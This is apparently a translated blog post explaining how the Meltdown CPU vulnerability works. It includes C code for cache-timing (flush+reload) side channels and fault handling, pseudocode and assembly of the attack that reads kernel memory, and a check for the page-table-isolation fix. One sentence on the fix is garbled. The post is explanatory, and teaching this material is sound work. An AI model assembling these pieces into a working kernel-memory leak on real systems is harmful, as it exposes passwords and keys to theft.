Meltdown and Spectre, the new processor vulnerabilities, have been in the headlines for three days now. Unfortunately, I could not immediately find anything that explains how exactly these vulnerabilities work (I started with Meltdown, since it is simpler), so I had to study the original publications and articles: the original paper, the Google Project Zero blog post, and an article from back in the summer of 2017. Although a translation of the introduction from the original paper has already been posted on Habr, I would like to share what I managed to read and understand.
UPD: added pseudocode to the attack description
For the last few decades, ever since the first Pentium appeared in 1993, Intel has been developing the superscalar architecture of its processors. The point is that the company badly wanted to make processors faster while keeping backward compatibility. As a result, modern processors are very complex designs. Just imagine: the compiler does its best to arrange instructions for execution in a single thread, and then the processor internally splits the code back into individual instructions and executes them in parallel where possible, reordering them along the way. All of this is because the processor contains many hardware units for executing instructions, and each instruction usually occupies only one of them. Adding fuel to the fire, processor clock frequencies grew much faster than RAM speed, which led to the appearance of level 1, 2 and 3 caches. A trip to RAM costs more than 100 processor cycles, a trip to the level 1 cache costs only a few, and a simple arithmetic operation such as addition takes a couple of cycles.
As a result, while one instruction is waiting for data from memory, for the floating-point unit to become free, or for something else, the processor speculatively executes the instructions that follow. Modern processors can keep on the order of a hundred instructions in flight this way (97 in Skylake, to be exact). Each such instruction works with its own copies of the registers (this is arranged at the reservation station), so while they execute they do not affect one another. Once instructions have executed, the processor lines up their results in order in the retirement unit, as if all this superscalar magic did not exist (the compiler knows nothing about it and assumes that instructions run sequentially, remember?). If for some reason the processor decides that an instruction was executed incorrectly, for example because it used a register value that an earlier instruction actually changed, that instruction is simply thrown away. The same happens when a value in memory changes, or when the branch predictor guessed wrong.
By the way, this should make it clear how Hyper-Threading works: add a second register allocation table and a second retirement register file, and voilà, we have two cores almost for free.
In 64-bit mode, each application has its own dedicated region of memory that it can read and write; this is userspace memory. In fact, however, kernel memory is also present in the address space of the process (I suspect this was done to speed up syscalls), but it is protected from access by user code. If user code tries to access this memory, it gets an error; this is enforced by the processor itself through its protection rings.
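To see this protection from the user side, here is a minimal sketch for Linux. It does not touch real kernel memory: as a stand-in (an assumption of this example) it maps a page with PROT_NONE, tries to read it, and catches the resulting SIGSEGV. The names read_faults and map_forbidden_page are made up for illustration.

```c
#define _DEFAULT_SOURCE          /* for MAP_ANONYMOUS on glibc */
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

static sigjmp_buf fault_env;

/* SIGSEGV handler: jump back to the point saved by sigsetjmp(). */
static void on_segv(int sig) {
    (void)sig;
    siglongjmp(fault_env, 1);
}

/* Returns 1 if reading *addr raised SIGSEGV, 0 if the read succeeded. */
int read_faults(const volatile char *addr) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    int rc = sigaction(SIGSEGV, &sa, &old);
    assert(rc == 0);
    (void)rc;

    volatile int faulted = 1;     /* stays 1 if we come back via the handler */
    if (sigsetjmp(fault_env, 1) == 0) {
        char value = *addr;       /* faults here if the page is protected */
        (void)value;
        faulted = 0;
    }
    sigaction(SIGSEGV, &old, NULL);   /* restore the previous handler */
    return faulted;
}

/* Stand-in for memory we are not allowed to read: a PROT_NONE page.
 * Returns NULL if the mapping could not be created. */
void *map_forbidden_page(void) {
    void *p = mmap(NULL, 4096, PROT_NONE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}
```

Calling read_faults on the page returned by map_forbidden_page should report a fault, while calling it on an ordinary local variable should not. A process that wants to keep running after touching forbidden memory needs some handler of this kind.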
When data cannot be read directly, you can try to exploit the side effects of the target's operation. A classic example: by measuring power consumption with high precision, you can tell apart the operations the processor is performing; this is how the KeeLoq chip used in car alarm systems was broken. In the case of Meltdown, the side channel is the time it takes to read data. If a byte is already in the cache, it is read much faster than if it has to be fetched from RAM and loaded into the cache.
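The difference is easy to observe from user space. The sketch below times one read of a buffer right after flushing it from the cache, and then once more while it is cached. It assumes an x86-64 CPU and a compiler that ships <x86intrin.h> (GCC or Clang); the helper names time_read and measure are made up for this example.

```c
#include <assert.h>
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

/* Time a single one-byte read of *addr, in timestamp-counter ticks. */
static uint64_t time_read(const void *addr) {
    unsigned int aux;
    _mm_mfence();                         /* finish earlier memory operations */
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();                         /* do not start the read early */
    unsigned char value = *(const volatile unsigned char *)addr;
    (void)value;
    uint64_t end = __rdtscp(&aux);        /* waits for the read to finish */
    _mm_lfence();
    return end - start;
}

/* Measure one read that misses the cache and one that hits it. */
void measure(uint64_t *flushed_ticks, uint64_t *cached_ticks) {
    static char buffer[4096];
    assert(flushed_ticks != NULL && cached_ticks != NULL);

    buffer[0] = 1;                        /* make sure the page is mapped */
    _mm_clflush(buffer);                  /* evict the line from the caches */
    _mm_mfence();
    *flushed_ticks = time_read(buffer);   /* has to go to RAM */
    *cached_ticks = time_read(buffer);    /* line was just loaded: cache hit */
}
```

On real hardware the flushed read is usually several times slower than the cached one, but the absolute numbers depend on the machine and a single measurement is noisy, so it is worth repeating the measurement many times.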
Actually, the essence of the attack is very simple and quite beautiful:
char userspace_array[256 * 4096];
for (i = 0; i < 256 * 4096; i++) {
    _mm_clflush(&userspace_array[i]);
}

const char *kernel_space_ptr = (const char *)0xBAADF00D;
/* This read faults, but the next line still runs speculatively */
unsigned char tmp = *kernel_space_ptr;
char not_used = userspace_array[tmp * 4096];

for (i = 0; i < 256; i++) {
    if (is_in_cache(&userspace_array[i * 4096])) {
        // Got it! *kernel_space_ptr == i
    }
}
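The pseudocode above leaves is_in_cache undefined. Here is a sketch of the cache part of the attack that can actually be run, under several assumptions: x86-64 with GCC or Clang, an ordinary user-space byte in place of the kernel byte, and a normal (not speculative) access in encode_byte. Instead of a boolean is_in_cache with a hard-coded threshold, it simply picks the page that reloads fastest. All function names are made up for this example.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

#define PAGE 4096
static unsigned char probe[256 * PAGE];

/* Time a single one-byte read of *addr, in timestamp-counter ticks. */
static uint64_t time_read(const void *addr) {
    unsigned int aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    unsigned char value = *(const volatile unsigned char *)addr;
    (void)value;
    uint64_t end = __rdtscp(&aux);
    _mm_lfence();
    return end - start;
}

/* Step 1: evict the probe array. Only the first byte of each page is
 * ever read, so flushing one cache line per page is enough here. */
static void flush_probe(void) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * PAGE]);
    _mm_mfence();
}

/* Step 2 (stand-in for the speculative access): touch the page
 * selected by the byte value. */
static void encode_byte(unsigned char secret) {
    unsigned char value = *(volatile unsigned char *)&probe[secret * PAGE];
    (void)value;
}

/* Step 3: the page that reloads fastest is the best guess for the byte. */
static int recover_byte(void) {
    int best = -1;
    uint64_t best_ticks = UINT64_MAX;
    for (int k = 0; k < 256; k++) {
        int i = (k * 167 + 13) & 255;   /* visit pages in a mixed order */
        uint64_t t = time_read(&probe[i * PAGE]);
        if (t < best_ticks) {
            best_ticks = t;
            best = i;
        }
    }
    return best;
}

/* Send one byte through the cache and return the receiver's guess. */
int transmit(unsigned char secret) {
    /* Write to every page so each one has its own physical memory. */
    memset(probe, 1, sizeof probe);
    flush_probe();
    encode_byte(secret);
    return recover_byte();
}
```

The stride of 4096 puts every possible byte value on its own page, which keeps neighbouring values from sharing a cache line. A single call to transmit can return a wrong guess because of timing noise, so in practice it makes sense to repeat it and take the most frequent answer.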
; rcx = kernel address
; rbx = probe array
retry:
mov al, byte [rcx]
shl rax, 0xc
jz retry
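mov rbx, qword [rbx + rax]

mov al, byte [rcx] reads the byte at the kernel address we are interested in; this is the access that raises the exception. shl rax, 0xc multiplies the value by 4096, so that every possible byte value lands on its own page of the probe array. mov rbx, qword [rbx + rax] "touches" the corresponding element of the probe array, which pulls it into the cache. The retry label and jz retry repeat the read whenever the result is zero: while the exception is being handled, rax can be reset to zero before the speculative instructions have used the real value, so a zero is treated as a failed attempt.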
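The protection against this attack is Kernel page-table isolation, which keeps kernel memory out of the address space of user processes. …, 1.5 ….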
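On Linux, kernels that carry the Kernel page-table isolation patches report the state of the mitigation through sysfs. As a small sketch (the helper name meltdown_status is made up here, and the file may be absent on older kernels or in restricted containers), a program can read it like this:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define MELTDOWN_STATUS_PATH \
    "/sys/devices/system/cpu/vulnerabilities/meltdown"

/* Copies the kernel's one-line status into buf.
 * Returns 0 on success, -1 if the file is missing or unreadable
 * (in that case buf is set to the empty string). */
int meltdown_status(char *buf, size_t size) {
    assert(buf != NULL && size > 0);
    buf[0] = '\0';

    FILE *f = fopen(MELTDOWN_STATUS_PATH, "r");
    if (f == NULL)
        return -1;

    int ok = fgets(buf, (int)size, f) != NULL;
    fclose(f);
    if (!ok) {
        buf[0] = '\0';
        return -1;
    }
    buf[strcspn(buf, "\n")] = '\0';   /* drop the trailing newline */
    return 0;
}
```

On a patched Intel machine the line typically reads something like "Mitigation: PTI"; other common values are "Vulnerable" and "Not affected".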
Source: https://habr.com/ru/post/346078/